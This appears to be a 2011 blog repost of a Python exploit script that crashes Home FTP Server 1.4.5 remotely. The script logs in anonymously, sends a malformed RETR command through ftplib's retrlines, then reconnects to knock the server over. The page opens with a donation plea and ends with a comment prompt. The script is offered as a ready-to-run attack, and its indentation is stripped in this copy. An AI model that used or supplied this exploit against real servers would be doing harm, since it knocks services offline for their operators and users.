Post Your Wish

Tuesday, May 17, 2011

Home FTP Server 1.4.5 Remote Denial of Service Exploit


HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!



Home FTP Server 1.4.5 Remote Denial of Service Exploit



# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Thats a very funny bug, and nobody understand how it works;]
# When we send a python FTP retrlines() function bad command and     create
# a new connection server got DoS... o0
# Thats not overflow, it's probubly in logic application.
# Special THX to: Rade0n3900
# Debug:
# ----------------------
# | EIP: 0100FE98 |
# | DS:[00FFFFED4]=??? |
# | ECX: 0100FED4 |
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = 'andrew.nile@gmail.com'
print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '| bY 0in From Tringle2011! |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
print 'connecting...'
ftp=FTP(ip)
ftp.login(login,passwd)
print 'sending...'
try:
ftp.retrlines("AAAA")
except Exception:
print 'ok!\nreconnecting...'
ftp=FTP(ip)
ftp.quit()
print 'DosEd'
#EoFF






No comments:

Post a Comment